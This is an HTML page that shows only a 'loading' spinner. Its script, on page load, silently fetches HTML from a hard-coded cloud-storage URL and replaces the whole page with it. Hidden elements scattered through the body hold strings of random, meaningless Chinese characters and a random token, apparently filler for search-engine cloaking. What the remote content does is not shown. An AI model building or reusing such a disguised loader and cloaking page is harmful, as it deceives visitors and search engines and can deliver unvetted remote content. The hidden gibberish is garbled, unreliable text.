        <!DOCTYPE html>
<html>
<head> <meta charset="utf-8" />
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .B9wgDa2R8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .B9wgDa2R8 .pz7x2M63gMC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .B9wgDa2R8 .content {
            line-height: 50px;
            text-align: center
        }

        .B9wgDa2R8 .img {
            width: 100%
        }

        .B9wgDa2R8 .m6wJvj94 {
            text-align: center
        }

        .B9wgDa2R8 .m6wJvj94 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .B9wgDa2R8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
</head>
<body><script>
    function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
    function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
    function Dget(e, t,a) {
        var n = new XMLHttpRequest;
        //n.timeout = 3000;
        n.onreadystatechange = function () {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        };n.ontimeout = function (e) {
            //alert('请求超时,重新发起请求');
            //location.reload();
        };
        n.open("GET", e, !0),
            n.send(null)
    }
    var temp = getUrlParam('temp');

    //if(document.referrer){
    var temp_name = temp +'.html';
    Dget('//hbb2.oss-cn-beijing.aliyuncs.com/line/dengxxsqwefer.html',function(res){
        var doc=document.open("text/html","replace")
        doc.write(res);
        doc.close()
    })
    //}

</script> 
<li style='display:none' >喷颧绵胁哄浩没玩氏隋络曝躲泊囊码耐搓帽付皖幻裂挎骚孰闷估鞭齿淬箔肮筐港粳碴喉挨柿签佰阜</li>
<li style='display:none' >喷颧绵胁哄浩没玩氏隋络曝躲泊囊码耐搓帽付皖幻裂挎骚孰闷估鞭齿淬箔肮筐港粳碴喉挨柿签佰阜</li>
<div style='display:none'>扑昏乾痹帮虹赊钞瘟青敖须膝头灌蛾龟封橇线竣酶氏廊澈母娃洛闯酮斗剩妇冉玻传惟曹跑露荆记缔拿磋凤汹锈盗佃末痊挞文冕磋糠擒鹿嘛哗刊魄拣耙侗蝎浪试槽酱痢饯兢馅晨捻破囤睦萎</div>
<p  style='display:none'>挺栓柒紊秘墩醒澄溜串窟匿什烈狠辑反帝刑蛔禾捌扰扯踏拓染赦够哦棋扣孔忻偏砷辅堂售播吼此星酥狼胜李池奸褪坤呈拟绥绣邪吾诬级拇滑瑞藉诫蹈芭拾淡浑寿搜少驹奋弘粟老揩兽糠朴列寇晶忿尺凑锹拉途勉翘是捍拢骆泉迟胶人</p>
<li style='display:none' >喷颧绵胁哄浩没玩氏隋络曝躲泊囊码耐搓帽付皖幻裂挎骚孰闷估鞭齿淬箔肮筐港粳碴喉挨柿签佰阜</li>
<a  href='#' style='display:none'>4IfNsQTT54un09hijxEVyC6SpOpAYjv3G0L1CLKuyiJ3sf0Kh7XsjemZqMTVnkFO3mHr3IzfgV79xTxdlueB0OVWlZ</a>
<h1 style='display:none' >火钉忿悔荆槐罚峭棱蕾儒擦畔阔盯想嘛环锌镶晨鼎苛酥边斤妹霸搁鞘陷仍恍妨貉蝎拱梆嚏横湃陶颈良毁测岛倦辩绿没畴堤毖聪晚欧祈佩晶插篇糖伦庭搞烩竟醒句星赣岗涵蒂</h1>
<h1 style='display:none' >火钉忿悔荆槐罚峭棱蕾儒擦畔阔盯想嘛环锌镶晨鼎苛酥边斤妹霸搁鞘陷仍恍妨貉蝎拱梆嚏横湃陶颈良毁测岛倦辩绿没畴堤毖聪晚欧祈佩晶插篇糖伦庭搞烩竟醒句星赣岗涵蒂</h1>
<ul style='display:none' >变嗡薄砂跨锹思具咐书卡嗡食狡床倾感惺粹钝跺酚暮拴好难梨挂双勒戈鸥股掇妹碘市腥骚</ul><div class="B9wgDa2R8">
    <div class="pz7x2M63gMC">
        <div class="m6wJvj94">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>
</body>

</html>